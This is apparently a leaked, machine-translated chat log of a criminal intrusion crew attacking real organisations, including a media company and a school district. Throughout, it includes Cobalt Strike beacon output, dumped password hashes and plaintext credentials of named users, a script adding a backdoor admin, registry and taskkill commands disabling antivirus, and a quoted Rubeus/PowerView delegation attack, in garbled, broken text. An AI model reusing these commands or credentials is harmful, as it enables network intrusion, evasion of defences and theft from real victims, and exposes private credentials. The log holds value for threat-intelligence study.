Did not come? 100% it must be because I was thrown out?
+x64?
apparently not registered as EDR, only Windows Defender....
``displayName=Windows Defender``
I'm not asking for the shellcode of your Cobalt, give me the x64 shellcode, then don't say anything.
net localgroup "administrators" Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator oasis_admin OASISPETR\Domain Admins OASISPETR\ryoung OASISPETR\SCOM 2012 Administrators The command completed successfully. If your session is up, maybe I should just change the cobo? Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title ========================= ======== ================ =========== ============ =============== ================================================== ============ ======================================================================== System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 550:46:16 N/A System 4 Services 0 144 K Unknown N/A 0:12:08 N/A Registry 104 Services 0 99,096 K Unknown N/A 0:00:14 N/A smss.exe 1108 Services 0 1,200 K Unknown N/A 0:00:00 N/A csrss.exe 1216 Services 0 5,556 K Unknown N/A 0:00:17 N/A wininit.exe 1324 Services 0 6,900 K Unknown N/A 0:00:00 N/A services.exe 1448 Services 0 14,680 K Unknown N/A 1:25:07 N/A lsass.exe 1464 Services 0 25,368 K Unknown N/A 0:02:36 N/A svchost.exe 1616 Services 0 6,480 K Unknown N/A 0:00:01 N/A svchost.exe 1664 Services 0 60,468 K Unknown N/A 0:01:21 N/A fontdrvhost.exe 1704 Services 0 4,404 K Unknown N/A 0:00:00 N/A svchost.exe 1844 Services 0 21,452 K Unknown N/A 0:05:14 N/A svchost.exe 1888 Services 0 351,868 K Unknown N/A 0:00:12 N/A svchost.exe 2040 Services 0 17,592 K Unknown N/A 0:00:08 N/A svchost.exe 1152 Services 0 8,808 K Unknown N/A 0:00:02 N/A svchost.exe 1144 Services 0 9,424 K Unknown N/A 0:00:01 N/A svchost.exe 1180 Services 0 10,608 K Unknown N/A 0:00:04 N/A svchost.exe 1444 Services 0 11,976 K Unknown N/A 0:00:01 N/A svchost.exe 1948 Services 0 9,440 K Unknown N/A 0:00:14 N/A svchost.exe 2008 Services 0 15,284 K Unknown N/A 0:00:02 N/A svchost.exe 2060 Services 0 10,680 K 
Unknown N/A 0:00:22 N/A svchost.exe 2196 Services 0 29,084 K Unknown N/A 0:07:19 N/A svchost.exe 2292 Services 0 15,996 K Unknown N/A 0:00:02 N/A svchost.exe 2300 Services 0 10,900 K Unknown N/A 0:00:04 N/A svchost.exe 2308 Services 0 53,020 K Unknown N/A 0:01:47 N/A svchost.exe 2324 Services 0 11,272 K Unknown N/A 0:00:23 N/A svchost.exe 2332 Services 0 116,176 K Unknown N/A 0:41:49 N/A svchost.exe 2340 Services 0 7,492 K Unknown N/A 0:00:02 N/A Memory Compression 2460 Services 0 6,720 K Unknown N/A 0:00:41 N/A svchost.exe 2532 Services 0 10,220 K Unknown N/A 0:00:01 N/A svchost.exe 2588 Services 0 9,528 K Unknown N/A 0:00:01 N/A svchost.exe 2596 Services 0 9,700 K Unknown N/A 0:00:01 N/A svchost.exe 2604 Services 0 18,032 K Unknown N/A 0:00:18 N/A svchost.exe 2856 Services 0 15,416 K Unknown N/A 0:00:04 N/A svchost.exe 2932 Services 0 12,280 K Unknown N/A 0:00:03 N/A svchost.exe 3016 Services 0 7,888 K Unknown N/A 0:00:04 N/A svchost.exe 3028 Services 0 11,456 K Unknown N/A 0:00:04 N/A svchost.exe 2172 Services 0 9,596 K Unknown N/A 0:00:04 N/A svchost.exe 2272 Services 0 9,660 K Unknown N/A 0:00:01 N/A svchost.exe 2564 Services 0 9,272 K Unknown N/A 0:00:10 N/A svchost.exe 2688 Services 0 10,828 K Unknown N/A 0:00:48 N/A svchost.exe 2764 Services 0 14,144 K Unknown N/A 0:00:01 N/A svchost.exe 3132 Services 0 55,284 K Unknown N/A 0:23:09 N/A svchost.exe 3236 Services 0 19,864 K Unknown N/A 0:00:01 N/A svchost.exe 3256 Services 0 15,324 K Unknown N/A 0:00:05 N/A svchost.exe 3268 Services 0 11,504 K Unknown N/A 0:00:38 N/A spoolsv.exe 3348 Services 0 31,140 K Unknown N/A 0:00:17 N/A svchost.exe 3524 Services 0 13,912 K Unknown N/A 0:00:02 N/A svchost.exe 3552 Services 0 9,112 K Unknown N/A 0:00:02 N/A BrokerAgent.exe 3680 Services 0 115,084 K Unknown N/A 0:00:47 N/A CdfSvc.exe 3688 Services 0 9,020 K Unknown N/A 0:00:01 N/A encsvc.exe 3708 Services 0 8,136 K Unknown N/A 0:15:44 N/A CseEngine.exe 3768 Services 0 31,752 K Unknown N/A 0:00:47 N/A PicaSvc2.exe 3816 
Services 0 59,540 K Unknown N/A 0:00:11 N/A UWACacheService.exe 3828 Services 0 48,584 K Unknown N/A 0:00:08 N/A CtxCeipSvc.exe 3844 Services 0 9,424 K Unknown N/A 0:00:29 N/A CmRcService.exe 3868 Services 0 14,192 K Unknown N/A 0:00:00 N/A svchost.exe 3888 Services 0 7,848 K Unknown N/A 0:00:01 N/A svchost.exe 3960 Services 0 16,604 K Unknown N/A 0:00:33 N/A CtxAudioService.exe 3980 Services 0 13,680 K Unknown N/A 0:00:01 N/A CtxSvcHost.exe 4012 Services 0 10,360 K Unknown N/A 0:00:00 N/A WebSocketService.exe 4052 Services 0 11,284 K Unknown N/A 0:00:00 N/A CtxSvcHost.exe 4092 Services 0 9,500 K Unknown N/A 0:00:01 N/A CtxSvcHost.exe 3228 Services 0 9,556 K Unknown N/A 0:00:01 N/A CtxSvcHost.exe 3444 Services 0 126,708 K Unknown N/A 0:00:03 N/A svchost.exe 3608 Services 0 46,272 K Unknown N/A 0:01:00 N/A svchost.exe 4116 Services 0 46,932 K Unknown N/A 0:02:39 N/A CtxSvcHost.exe 4264 Services 0 9,540 K Unknown N/A 0:00:02 N/A svchost.exe 4288 Services 0 7,236 K Unknown N/A 0:00:01 N/A VGAuthService.exe 4304 Services 0 12,024 K Unknown N/A 0:00:04 N/A vmtoolsd.exe 4312 Services 0 24,408 K Unknown N/A 0:04:45 N/A MsMpEng.exe 4340 Services 0 235,604 K Unknown N/A 0:35:37 N/A svchost.exe 4348 Services 0 22,264 K Unknown N/A 0:00:02 N/A CtxSvcHost.exe 4632 Services 0 9,520 K Unknown N/A 0:00:01 N/A CtxSvcHost.exe 4640 Services 0 9,704 K Unknown N/A 0:00:01 N/A svchost.exe 4744 Services 0 11,780 K Unknown N/A 0:00:38 N/A svchost.exe 4760 Services 0 9,248 K Unknown N/A 0:00:02 N/A svchost.exe 4784 Services 0 7,152 K Unknown N/A 0:00:02 N/A svchost.exe 4820 Services 0 10,500 K Unknown N/A 0:00:02 N/A dllhost.exe 5292 Services 0 16,212 K Unknown N/A 0:00:13 N/A svchost.exe 5416 Services 0 11,572 K Unknown N/A 0:00:01 N/A WmiPrvSE.exe 5440 Services 0 39,052 K Unknown N/A 0:41:08 N/A WmiPrvSE.exe 5692 Services 0 52,708 K Unknown N/A 0:09:35 N/A msdtc.exe 5780 Services 0 13,344 K Unknown N/A 0:00:02 N/A svchost.exe 6364 Services 0 22,544 K Unknown N/A 0:05:27 N/A svchost.exe 
6668 Services 0 9,036 K Unknown N/A 0:00:01 N/A CtxSvcHost.exe 6992 Services 0 8,308 K Unknown N/A 0:00:02 N/A SemsService.exe 7000 Services 0 35,776 K Unknown N/A 0:00:06 N/A ctxrdr.exe 7012 Services 0 8,684 K Unknown N/A 0:00:02 N/A CpSvc64.exe 7024 Services 0 15,924 K Unknown N/A 0:00:04 N/A svchost.exe 7192 Services 0 9,216 K Unknown N/A 0:00:38 N/A svchost.exe 7268 Services 0 6,908 K Unknown N/A 0:00:01 N/A SearchIndexer.exe 7488 Services 0 50,656 K Unknown N/A 1:03:01 N/A WmiPrvSE.exe 8056 Services 0 14,196 K Unknown N/A 0:01:05 N/A svchost.exe 4672 Services 0 11,364 K Unknown N/A 0:00:02 N/A svchost.exe 2956 Services 0 28,712 K Unknown N/A 0:02:14 N/A svchost.exe 7548 Services 0 13,604 K Unknown N/A 0:03:46 N/A CcmExec.exe 3336 Services 0 69,960 K Unknown N/A 0:01:50 N/A svchost.exe 2520 Services 0 18,964 K Unknown N/A 0:00:01 N/A WmiPrvSE.exe 2220 Services 0 18,432 K Unknown N/A 0:00:11 N/A TelemetryService.exe 7560 Services 0 81,596 K Unknown N/A 0:00:21 N/A AotListener.exe 2072 Services 0 36,720 K Unknown N/A 0:00:01 N/A conhost.exe 4136 Services 0 12,768 K Unknown N/A 0:00:00 N/A SgrmBroker.exe 5404 Services 0 6,160 K Unknown N/A 0:00:05 N/A WmiPrvSE.exe 6688 Services 0 10,540 K Unknown N/A 0:00:00 N/A WmiPrvSE.exe 8532 Services 0 53,972 K Unknown N/A 0:00:06 N/A svchost.exe 8916 Services 0 17,940 K Unknown N/A 0:00:03 N/A svchost.exe 8972 Services 0 10,060 K Unknown N/A 0:00:03 N/A svchost.exe 3384 Services 0 33,832 K Unknown N/A 0:00:13 N/A svchost.exe 6032 Services 0 21,468 K Unknown N/A 0:00:02 N/A SecurityHealthService.exe 2896 Services 0 18,372 K Unknown N/A 0:00:03 N/A svchost.exe 2088 Services 0 11,516 K Unknown N/A 0:00:02 N/A NisSrv.exe 8760 Services 0 10,852 K Unknown N/A 0:00:04 N/A svchost.exe 3084 Services 0 17,980 K Unknown N/A 0:00:04 N/A svchost.exe 5652 Services 0 9,660 K Unknown N/A 0:00:00 N/A svchost.exe 9604 Services 0 10,792 K Unknown N/A 0:00:01 N/A svchost.exe 14016 Services 0 12,708 K Unknown N/A 0:00:00 N/A csrss.exe 6224 
``` At line:1 char:1 + <# + ~~ This script contains malicious content and has been blocked by your antivirus software. ``I think it's blocking the connect@tl1 lvm biller dlllok try it, it fudne understand that ?versionlvm try it worse if you try the old cryptor ?removeagajdin what ? waiting now rebooting32 is 64 bit dll ? give dll to work ?i seea put this command plizmozhetd to tsmd is there still? 
rdp, vntz and so on start somerp, powershell, cmd, execute and so on what do you mean? verify what analogues run? any suggestions how to raise the session ?I will google it, don't forget about the account please) there is a principle of communication target machine + cobas for cobas on the git many of themc2 profiles of course let me give you a vector to read about c2 profiles just yet too broad topic on the detects for the current dialogueI mean, if the shell download from another url and it will then knock in the coba?and if it's quitting, is it quitting only the URL when the shell is downloaded or all the URLs? and also, how can you tell if the averter is quitting the URL? well, do us ack if you can. even good in general not bad, try to work with this dll (shelter only 32 can (because they themselves should be less scarey to build x64 and yet the 22 avers are silentWebroot SecureAnywhere Dynamic detect1 detekt na neplohokdoekdo 10 min verifyStrongNameKeyGenenen what input point? oh yeah) ah, something new decided to try x32 - is shelterPro uzayu x64? based on what you build? let me throw you - check? yeah dunno. not pull - I want to check. urgent need? and how? for office you better have a separate account can you give access to a service that is like a virrostotal? Check the dllk two of the whines (per hell) on the list have this port? CORPKIOINTSQLP.CORP.TELEVISA.COM.MX 10.7.6.186:2717 ``from a scan point may be closed, in one MSSQLSvc/CORPKIOBDD101.corp.televisa.com.mx:2717 in the others no + this port is closed port in spn? 
from hell ``Is there any way we can still find out what port the skull is running on if ladon and msf don't give anything on the skull? they have custom ports on the skull on one server it's on port 50101 and the other servers are closed `CORP\ctxdbadmin 7106c947d3a8abbea16cb5448f4ac00a` they have `Administrator` on some machines and `Administrador` on others, most likely yes in the main domain almost everything is in English)may be they have international dialectic only need to learn) kek100% YES is to go to work in this company admin))it all gives a chancedano check skulia even in one half may be one LA, the second other LA yes, it is worth a try but the chances are, of course, 50\50 because there are few overlapping LAs, conventionally in one group of servers one LA and eventually expand the network will be found We can check the rest of the pool of servers with this group LA can be hashdump polzak from this group may have local admins from the group that you have not seen before)`` CORPKIOBDD101\sqladmin:::2d593a1a330c2649716df558a5912ceb::: ``no, but does that do us any good? there are a couple of whines where there is access, but the admins are sitting right on a limited number of cars, including dk and whines among them no you skul servaks brute force? or check the anonymous entrance? but from the classics ``you abuzilal genericall right? didn't you abusive genericall rights? ``` Full control of a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project. 
First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account: New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account: $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid We now need to build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again using PowerView in this case: Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} We can then use Rubeus to hash the plaintext password into its RC4_HMAC form: Rubeus.exe hash /password:Summer2018! And finally we can use Rubeus' *s4u* module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER: Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB68393941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt ``` there is a user who has these permissions on the dk, or rather even a whole group, only I don't really understand how it works. We add a machine account, sort of replace the original? That is, we reset the password from the machine account, and since it is dk, the network will fall. 
Pinging filialeadc01.filial.televisa.com.mx [10.30.17.24] with 32 bytes of data: Reply from 10.30.17.24: bytes=32 time=67ms TTL=122 Ping statistics for 10.30.17.24: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 67ms, Maximum = 67ms, Average = 67ms beacon> portscan 10.30.17.24 445 none [*] Tasked beacon to scan ports 445 on 10.30.17.24 [+] host called home, sent: 93285 bytes [+] received output: 10.30.17.24:445 ``+CORPKLHLQRD01 - pass``demosave.com``FILIAL\Ivargasv 2d0a7cb1ea602f59dc9c7ee5bd11597b` valid`FILIAL\jcgarciae TVSAcrm8888!Valid with user1poka all are busy, reserve for us) appeared fresh in the work grid, if anyone idle - beep in pm please where you pass + + others who are without tasks now - write, do not keep silent, on you chetu on then i got it right - two interfaces on the touchceno also from chetu by the looks of on chetu just there, i move sideways and then the session came but the ip is different now run if you do not have session thrown me chetu? hello there. everything. sait i got it back khanypot it's definitely averm i think it's aB`threattest.edgewave.com i don't have a live one yet, who has sessions left elsewhere ?on regbest.com should be coming soon session from chetu.com - tell me how it will arrive in .binverno-10 minutes now will be ready paiload - i will make all hello, we need dllk segonday for bouncing, right? 
``` Scanner module is complete The kerb would be very helpful ... looking for a grid really big, oushek trash.on this, apparently, and no addinskih kreds.`` @ECHO OFF net user LEADMIN Deere0419! 
/add net localgroup Administrators LEADMIN /add WMIC USERACCOUNT WHERE Name='LEADMIN' SET PasswordExpires=FALSE ``He found a script, I think with his help, they administered polzakowest little admin, apparently a local net division I checked - active or the account off or a real blank password if it does not contradict the policies of the addpost because it can not access the real hashdump question: how can it happen that hashdump shows a blank password for the dude who has the account is active?the neighbors have come back hogeys no voodoo it's not generalsessions and stuff clean up files as you can optionally set ignores and scans off of course there's no offsets there Using command linehttps://www.bitdefender.co.th/wp-content/uploads/gz/Bitdefender_EndpointSecurityToolsForWindows_UsersGuide_enUS.pdfhttps://www.wilderssecurity.com/threads/bitdefender-free-edition-service-start-stop-script.245247/ ``` net start XCOMM sc config XCOMM start= auto net start bdss sc config bdss start= auto net start VSSERV sc config VSSERV start= auto net start LIVESRV sc config LIVESRV start= auto "C:\Program Files\Softwin\BitDefender10\bdmcon.exe" net stop LIVESRV sc config LIVESRV start= demand net stop VSSERV sc config VSSERV start= demand net stop bdss sc config bdss start= demand net stop XCOMM sc config XCOMM start= demand ``Send it to the forum and let it sit there. https://codeby.net/threads/antivirusy-v-nokaut.60706/моих no there are no files in the system32 no old ones, surely they are not in the system32 not mine, and I have not left anywhere else) and also? allzona in the folder zabix, and the rest in the system32 dns where were they?) yes old files removed? already clean up the codeyda files all? 
thanks excellent + I say files do not forget to clean up after themselves you by the way at this rate in the system will shit all over the wild no it is ok `` User7[GEORDI]Administrator */4692|2020Dec07 19:46:30> shell wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt" [*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt" [+] host called home, sent: 175 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 7116; ReturnValue = 0; }; ``` but there's a problem with the second command, it doesn't output the dnsyd file) `` `` User7[GEORDI]Administrator */4692|2020Dec07 19:38:31> shell wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt" [*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt" [+] host called home, sent: 129 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 2576; ReturnValue = 0; }; ``Tool is in place, so everything is ok maybe remove the blank spaces from the > sign, if there is then it is the wrong way to run it check in system32 the utility file is not in the directory in short it did not work`sisd.k12\ExchAdmin f461d17330cadafe07025e2252256eda52a` under these creeds did not even copy it there for some reason... I don't see what the problem is with this)‖dll starts,‖ which means you somehow execute commands and you have mapping there.‖ Nowdll starts but no session arrives. User7 will come to him for details I think you have a way to start or not knocking?[ ](https://mediaeveryone.com/group/sisd-net?msg=zxeqyR78o3vFDDKu) do not come up i.e. 
there is no way to control? and stask? wmi disabled I'm waiting for the day I think you know the answer you need a session to work on a remote host? how kids already want to scoldbozhej jump on them did not work, I now try through sharpsbeck dns where?no, everything is correct - not rising and the sessions now let's try again, i screwed up like that just tell me what is it with dhc01 with dhcp role it can be in this network dhcp servers are called dhcp1 and dhcp2 now to the question of sessions on dhcp I did not read the messages above nudhcp and dhcp for the guys the same thing?dhcp1 and dhcp2) now the session is dhcp1 and dhcp2. dhcp does not work with dhcp I do not know how it works with you at all forget about the jump on them dll not copy, jump also does not work they just dhcp called dhcp, dnsa why dhcp you? 3 servers can not jump to dhcp static Windows IP Configuration Host Name . . . . . .: SchoolBooks Primary Dns Suffix . . . . ♪ admin.sisd.k12 ♪ Node Type . . . . .: Hybrid IP Routing Enabled. . . . : No WINS Proxy Enabled. .: No DNS Suffix Search List. .: admin.sisd.k12 sisd.k12 Ethernet adapter Ethernet: Connection-specific DNS Suffix : Description . . . . . . .: Microsoft Hyper-V Network Adapter. Physical Address . . . . .: 00-15-5D-01-DF-19 DHCP Enabled . . . . .: No Autoconfiguration Enabled . .: Yes Link-local IPv6 Address . : fe80::740f:5d54:8746:1b6d%6(Preferred) IPv4 Address . . . . .: 10.0.51.46(Preferred) Subnet Mask . . . : 255.255.0.0 Default Gateway . . . . : 10.0.1.254 DHCPv6 IAID . . . . : 100668765 DHCPv6 Client DUID . . . . : 00-01-00-01-26-88-57-CF-00-15-5D-01-DF-19 DNS Servers . . . . : 10.0.51.74 10.0.51.75 NetBIOS over Tcpip. . . . .: Enabled `````` Network Card(s): 1 NIC(s) Installed. [01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: No IP address(es) [01]: 10.0.51.46 [02]: fe80::740f:5d54:8746:1b6d ``I also check that we have statics on all servers partially dhcp on armas? 
Network Card(s): 1 NIC(s) Installed. [01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: No IP address(es) [01]: 10.0.51.3 [02]: fe80::3c15:2b64:760d:eb2b ``And dnscmd is only on dns servers? Do not shoot all in a row check a few armies and servers and tell me exactly where it is, let's do it without maybe on the servers maybe static? Windows IP Configuration Host Name . . . . . . ♪ Geordi ♪ Primary Dns Suffix . . . : sisd.k12 Node Type . . . . .: Hybrid IP Routing Enabled . . . . No. WINS Proxy Enabled. .: No DNS Suffix Search List. : sisd.k12 Ethernet adapter Ethernet: Connection-specific DNS Suffix : Description . . . . . . .: Microsoft Hyper-V Network Adapter. Physical Address . . . . : 00-15-5D-01-80-12 DHCP Enabled . . . . .: No Autoconfiguration Enabled . .: Yes Link-local IPv6 Address . : fe80::3c15:2b64:760d:eb2b%4(Preferred) IPv4 Address . . . . .: 10.0.51.3(Preferred) Subnet Mask . . . : 255.255.0.0 Default Gateway . . . . : 10.0.1.254 DHCPv6 IAID . . . . . : 50337117 DHCPv6 Client DUID . . . . : 00-01-00-01-23-90-84-20-00-15-5D-01-80-12 DNS Servers . . . . : 10.0.51.74 10.0.51.75 NetBIOS over Tcpip . . . ♪ Enabled ♪ Tunnel adapter Local Area Connection* 2: Media state ... ... ... ♪ Media disconnected ♪ Connection-specific DNS Suffix : Description . . . . . ♪ Microsoft ISATAP Adapter ♪ Physical Address . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled . . . . .: No Autoconfiguration Enabled . .: Yes ````for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt ` at first ` dnscmd /enumzones > AllZones.txt ` how to remove dns I'll tell you a few arms just in case and from the second? yes that's from this domain as I understand ` Connection-specific DNS Suffix . : admin.sisd.k12 ``[ ](https://mediaeveryone.com/group/sisd-net?msg=x2ctb3ESgCPjiNgNn) from Armagh. DNS Servers . . . . : 10.0.51.74 10.0.51.75 ``[ ](https://mediaeveryone.com/group/sisd-net?msg=96HNaj7DMbYkmC8Mt) what's that from? 
beacon> shell ipconfig /all [*] Tasked beacon to run: ipconfig /all [+] host called home, sent: 44 bytes [+] received output: Windows IP Configuration Host Name . . . . . : SRM-312-020. Primary Dns Suffix . . . . ♪ admin.sisd.k12 ♪ Node Type . . . . Hybrid IP Routing Enabled . . . . : No WINS Proxy Enabled. .: No DNS Suffix Search List. .: admin.sisd.k12 sisd.k12 sisd.k12 Ethernet adapter Ethernet: Connection-specific DNS Suffix . . : admin.sisd.k12 Description . . . . . ♪ Realtek PCIe GBE Family Controller ♪ Physical Address . . . . : B8-85-84-AA-FB-02 DHCP Enabled. . . . . .: Yes Autoconfiguration Enabled. .: Yes IPv4 Address. : 10.57.243.225(Preferred) Subnet Mask . . . : 255.255.0.0 Lease Obtained . . . . ♪ Wednesday, September 16, 2020 5:30:41 PM ♪ Lease Expires . . . . .: Tuesday, December 8, 2020 5:31:27 PM Default Gateway . . . . : 10.57.1.254 DHCP Server . . . . : 10.0.51.4 DNS Servers . . . . : 10.0.51.74 10.0.51.75 NetBIOS over Tcpip . . . ♪ Enabled ♪ ``+ remove dns in general find infuna unlikely staticsu armaments dhcp or statics? in general here they also pinged probably) citricos armaments? I mean, they change from time to time citricos dhcpdns not see statics or dhcp in armaments? 
already all pinged`` `` take off the dhcp see the armies on dhcp or static and ping them ``There's a problem for 1 man-session in two domains in the slip so far, throw in a good jobWin Def ``` reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f reg add "HKLM_SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f reg add "HKLM/SSOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f reg add "HKLM/SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f reg add "HKLM/SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f ``Symantec ``` net stop srservice ``Avast ``` @Echo off taskkill /f /im ashMaiSv.exe taskkill /f /im ashServ.exe taskkill /f /im aswUpdSv.exe taskkill /f /im ashDisp.exe Exit /b ``[ ](https://mediaeveryone.com/group/sisd-net?msg=wfYTtjYHM5woBJWMs) I've only seen it on one viewIf there is no central system let someone look for ways to turn off all the avers manuallywhat's this thing that bothers me...> 200 servos and > 4000 users then it turns out 3 people from here without tasks yet? as usual all of them. then we wait. 
will only steal servos or users too? dept will not do it we have contact with dept, maybe order it ourselves?we have to wait for tl2build now there is no tl2build, let's finish with it then? ok, where as. there solyanka assembled and the rest are empty? mostly on the file and skulas bitdefender stands, if i'm not mistaken plus/minus when the servos sorted from each processlists took a lot more than 50% of all the servers?[ ](https://mediaeveryone.com/group/sisd-net?msg=SSZ24JGTuwpkRkWib) by process many have nothing but vindef at all how did you determine? differently the server segment is covered by what? maybe they don't have a centralized avera after all? We found avira, bitdefender, CORTEX XDR™ and I think something else...both from polzac and from the system from the context of the polzac process? sharpweb found nothing, as well as sibeltda don't forget to change the process if it kicks out don't go there1 session 1 sharpweb, not more? and here is the description Usage: .\SharpWeb.exe arg0 [arg1 arg2 ...] Arguments: all - Retrieve all Chrome, FireFox and IE/Edge credentials. full - The same as 'all'. chrome - Fetch saved Chrome logins. firefox - Fetch saved FireFox logins. edge - Fetch saved Internet Explorer/Microsoft Edge logins. ``see the edge folder in the projecthttp://github.com/djhohnstein/SharpeWeb does he use edge? ff? which is probably quieter than chrome) and kicked out - just sessions fell off via lazagne from the toolchain and how did you try to get them back?kicked out how? I found where the DA sits, but he kicked me out quickly, while I was trying to steal the credentials from the browser look for web access it must still be on amazon, on the data2 and dc domain sisd.k12 no admin avera - I'm there by rdp went to ...ok just describe the situation normally and not bits and pieces sketch in the general conf conf conf this case of migration between domains and was Lanu yes, but I learned that after dksinka and this polzak was LA? 
so maybe there was not an admin with such creds this car in the domain `ADM `, I was lucky that the local admin with the same creds do not, this is about another issue[ ] (https://mediaeveryonecom/group/sisd-net?msg=BxPbEPBQ7Q9m3tSoZ) this admin process was where you had the session? `sisd.k12\ExchAdmin f461d17330cadafe07025e2256eda52a` - under these creds you can look directories on DATA2 but session is not raised in the ADM domain admin process on what question yes?)ADMdathe domain? that domain? admin what? let me start at the beginning, I was given a session under the system, I logged into the admin process and already under it looked at directories[ ](https://mediaeveryone.com/group/sisd-net?msg=cNQpCcL7oMoYo9i6zC) how did you check the diaries? you had to have access to that domain to give you a listing diaries`Sam07bo`f461d17330cadafe07025e2256eda52a found on cmd5 @tl1 make clickpls then jumped diary checked directories of cars that domainanet, how did you get in?and the session went up after running vmikomdl scripted in dlkak did you do? 
[DC] 'sisd.k12' will be the domain [DC] 'Geordi.sisd.k12' will be the DC server [DC] Exporting domain 'sisd.k12 [DC] ms-DS-ReplicationEpoch is: 1 ``USSC1500slip in 400 sec and leavesessions from rundll processes move to the systemmemo for tomorrowLocal admins found, hashes collected, go to the domainuntil then draw a line last message and for tomorrow check domain availability againCheck domain availability againTomorrow) you bypassed yuac module which disassembled) I about local admin[ ](https://mediaeveryone.com/group/usscgroup?msg=F4MBctxLgBSNGajBK) have not paid attention? 
Username : stwitchell * Domain : USSCGROUP.LOCAL * Password : 3stwitchell3# ``Local admin list still + password from the current one`` beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82501 bytes [+] received password hashes: ``ask your colleagues how they got around yuac, you also polozak local admin today to a maximum of 12 hours, if you do your volume, tomorrow you can safely parse records)did not sign what the docs?)but I do not think that you for so many days of study, all written in one doc and did not delimit it in any way@user1 will have time, be sure)[ ](https://mediaeveryone.com/group/usscgroup?msg=Kqt3htCFgYRoGeoh8) do not remember, most likely yes `User USSC1500\Nimda99 S-1-5-21-2785713682-3075257879-4011609139-1001` and 1001 on the end means that the admin ?we had so many modules, we ran them for days in the lab and made notes, or they have run out?) not enough information? collect more and what is it? how to be further? you have ad info? don'tttalk on gathered info or dilute less loadeda meanwhile, if the session began to take commands again, you can send thema)[ ](https://mediaeveryone.com/group/usscgroup?msg=TQe8r8DwKcwkHvxTr) as soon as the session died out (passed the slip, then returned to normal) and no output came, you can continue to write commands)``[] [!] CVE-2019-1064 : VULNERABLE [>] https://www.rythmstick.net/posts/cve-2019-1064/ [!] 
